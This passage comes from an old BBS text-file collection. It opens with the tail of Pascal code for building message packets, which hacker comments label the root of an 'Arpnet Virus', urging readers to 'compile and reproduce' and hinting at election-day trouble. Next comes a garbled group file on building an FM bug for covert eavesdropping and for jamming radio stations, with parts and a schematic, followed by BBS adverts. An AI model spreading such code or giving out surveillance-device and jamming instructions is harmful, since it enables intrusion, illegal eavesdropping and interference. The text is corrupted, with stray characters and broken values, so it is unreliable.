  5052.                               IF (POS(' ' + destnode.serial_num,mesg_text[i]) > 0)
  5053.                                  AND seen THEN
  5054.                                  i := 0
  5055.                               ELSE
  5056.                                  INC(i)
  5057.                            UNTIL (i = 0) OR (POS(#$FF,mesg_text[i]) > 0);
  5058.                            IF (i <> 0) AND ((NOT bit(mesg.flags,5) AND fwd) AND
  5059.                               bit(mesg.flags,8)) AND
  5060.                               NOT ((new_net = 0) AND (new_node = 0)) THEN
  5061.                               BEGIN
  5062.                                  writest('Packet to Net/Node: ',2,4);
  5063.                                  WRITE(new_net,'/',new_node,' ',destnode.serial_num,'   ');
  5064.                                  writest('Title: ' + mesg.title,2,5);
  5065.                                  CLREOL;
  5066.                                  construct_packet(new_net,new_node)
  5067.                               END
  5068.                         UNTIL NOT more;
  5069.                         mesg.flags := mesg.flags OR $0020;
  5070.                         SEEK(mesg_dir,t3);
  5071.                         WRITE(mesg_dir,mesg)
  5072.                      END;
  5073.                   t3 := mesg.sub_dir_link;
  5074.                   SEEK(mesg_dir,t3);
  5075.                   READ(mesg_dir,mesg)
  5076.                UNTIL mesg.dir_link < 0
  5077.             END  ∩7Å3 è      END;
  5078.    UNTIL t1 <= 0;
  5079.    GOTOXY(2,4);
  5080.    CLREOL;
  5081.    CLOSE(mesg_dir);
  5082.    ASSIGN(email_dir,default.email_drive + email_file_dir);
  5083.    {$I-} RESET(email_dir); {$I+}
  5084.    IF IOresult <> 0 THEN
  5085.       BEGIN
  5086.          WRITELN(log_file,'I can''t open the email directory!');
  5087.          writest('I can''t open the email directory!',2,4);
  5088.          EXIT
  5089.       END;
  5090. {-------------CAUGHT SO WHAT DO YOU DO...DOESN'T MATTER DOES IT?--------}
  5091.    WHILE NOT EOF(email_dir) DO BEGIN
  5092.       READ(email_dir,email);
  5093.       IF test_bit(email_bit,FILEPOS(email_dir) - 1) AND
  5094.          bit(email.attrib,0) AND NOT bit(email.attrib,5) THEN
  5095.          BEGIN
  5096.             more := FALSE;
  5097.             fwd := TRUE;
  5098.             get_route_info(email.dest_net,email.dest_node,new_net,new_node,fwd,more);
  5099.             get_node_info(new_net,new_node,destnode);
  5100.             IF (new_net <> 0) OR (new_node <> 0) THEN
  5101.                BEGIN
  5102.                   read_for_edit(default.email_drive + email_msg_dir,
  5103.                                 email.msg_link,mesg_text);
  5104.                   writest('Packet to Net/Node: ',2,4);
  5105.                   WRITE(new_net,'/',new_node,' ',destnode.serial_num,'   ');
  5106.                   writest('Name:  ' + email.dest_name,2,5);
  5107.                   CLREOL;
  5108.                   mesg.orig_node := email.org_node;
  5109.                   mesg.orig_net := email.org_net;
  5110.                   mesg.dest_node := email.dest_node;
  5111.                   mesg.dest_net := email.dest_net;
  5112.                   mesg.flags := email.attrib;
  5113.                   mesg.dest_user := email.dest_name;
  5114.                   mesg.org_user := email.org_name;
  5115.                   mesg.title := '|/<Email>\|';
  5116.                   construct_packet(new_net,new_node)
  5117.                END;
  5118.             email.attrib := email.attrib OR $0020;
  5119.             SEEK(email_dir,FILEPOS(email_dir) - 1);
  5120.             WRITE(email_dir,email)
  5121.          END
  5122.    END;
  5123.    CLOSE(email_dir);
  5124.    WRITELN;
  5125.    CLREOL;
  5126. {---------PUNISHMENT I WANT TO KNOW WHERE IT GOES BETTER LEFT OUT------}
  5127.    writest('Packets constructed: ' + strval(msg_counter),7,7);
  5128.    IF paramstr(1) = '' THEN
  5129.       BEGIN
  5130.          writest('Press any key to continue',6,8);
  5131.          hidecursor;  ∩7Å3 è         ch := readkey;
  5132.          IF ch = #0 THEN
  5133.             ch := readkey;
  5134.          showcursor
  5135.       END;
  5136.    closewindow(4);
  5137.    WRITELN(log_file,'Done making the packets. Constructed: ',msg_counter)
  5138. END;
  5139. {---RIGHT LOOKS GOOD AND USEFULL  COMPILE AND REPRODUCE AND REPRODUCE----}
  5140. END.
  5141. {Above code: Is a GMPFU@C, Gone Made from UnderGrad @ College -Program 87}
  5142. {->Arpnet Virus:attachments must be modified,take out the write statements for}
  5143. {better effect and code speed, this is the root of the virus without any }
  5144. {destructive tendencies......hehehe}
  5145. {ShadowSpawn cc @wiskiesour@.988, ACTUALLY MY NAME THIS WEEK IS GEORGE BUSH}
  5146. {--------------------------------------------------------------------------}
  5147. {It gets better, wait till election Day!!!!!!!...better close your.........}
  5148.  
  5149.  
  5150.   
  5151. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                          %%                   <> How to make an FM ieess BUG <>                      %%                                                                          %%                         By: <-> Johnney Rotten <->                          %%                                                                          %%         <> A Cryptic Ciminls/Eite Justice Society presentation <>        %%                                                                          %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%What it is----------This handy little device can be used for two purposes. The firt is a M bug,hich transmits on the FM frequency, thus making it extremely easy to pick up.The seond is aFM statin blocker (which can be really fun if you are pissedat someone who just happens t be listeing to th radio. In this case, you can do 1 (or both) of these: A) announce through the ug (on ther station)that Fred (whoever is listening) has just won 1 years supply of orthopedicsho pads, or B disconnectthe mike, and let it fry the station.) In thisfile, I will make some incredbly lame schmatics, whic any fool can follow,(lets see you make good schematics with Apple Writer, and tell yo all thejunkyou need (duh..) Ok, if you have no electronics background at all, goahad and try it nyways (hell, t's not my money your wasting on parts)   Required Parts-------------(1) 2n3904transistor...........................[Q1](1) 10k resistor (+-5%).........................[R1](1) .7k resistor (+-%).........................[R2](1) 1k resistor (+-5%)..........................[R3(1) .001 uf capaitor............................[C1](1) 5 to 80 pf variable capcitor...............[C2](1) 10 pf cpacitor..............................[C3](2) .5 uh coils................................[L1,L2](1)SpSt slide switch............................[S1](1) 9 voltbattery clip.........................[B1(1) Antenna or antenna wire (3 in. or more)......[A1](1)microphone (like one ut of a phone)........[M1]Schematics----------          ---------------------------*------------*-------------*         |             |             |             |            |          |            |            |             |             |   +A1          |            |             |            |             1  |          S1            R1            |            C2            |   |          |             |            |             |             *----         |             |            |             |            |          +             |            |             |            L2          B1           |             |             |             |          -             |            C1            |            |          |             |            |             |            |          |            *-------------*------Q1/-----*-----------*          |             |                     \                 |  --------*             |                      \________________C3mike                                                            |  --------*             |                                       |          |             R2                                      R3          |             |                                       |          |             |                                       |          -------------------------------------------------------How to operate-------------1. Turn on (duh..)2. urn the variable capacitor until youare on the station that you want to  use (preferably towards ether end, so if they turn on their raio, theydon't get a bunch of audio fedback when they hit you station)3. This bug does not have along range (50 ft max), but if you usea large antenna on yor stereo (like the rooftop kind) the rage is greatly increased.I prefer to us a AM/FM walkman, soI can get close to the bug, and tape whaI want.-----------------------------------------------------------------------------(C) Januar 1, 1986 Cryptic Criminals/Elite Justice ociety |Thanks: r. Deth-----------------------------------------------------------------------------Call these ool boards:Castle Asgard.........[10 meg BS/AE/FUR].......(818) 788-3594Remote Hideut........[2 meg BBS/AE/FUR].......(818) 709-1079Treasue Island.......[2 drv AE/PW: RUSH].......(41) 547-2805
  5152.  
  5153. X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
  5154.  
  5155.  Another file downloaded from:                               NIRVANAnet(tm)
  5156.  
  5157.  & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
  5158.  The Salted Slug                          Strange              408-454-9368
  5159.  Burn This Flag                           Zardoz               408-363-9766
  5160.  realitycheck                             Poindexter Fortran   510-527-1662
  5161.  Lies Unlimited                           Mick Freen           415-583-4102
  5162.  Tomorrow's 0rder of Magnitude            Finger_Man           415-961-9315
  5163.  My Dog Bit Jesus                         Suzanne D'Fault      510-658-8078
  5164.  New Dork Sublime                         Demented Pimiento    415-566-0126
  5165.  
  5166.    Specializing in conversations, obscure information, high explosives,
  5167.         arcane knowledge, political extremism, diverse sexuality,
  5168.        insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
  5169.  
  5170.   Full access for first-time callers.  We don't want to know who you are,
  5171.    where you live, or what your phone number is. We are not Big Brother.
  5172.  
  5173.                           "Raw Data for Raw Nerves"
  5174.  
  5175. X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
  5176.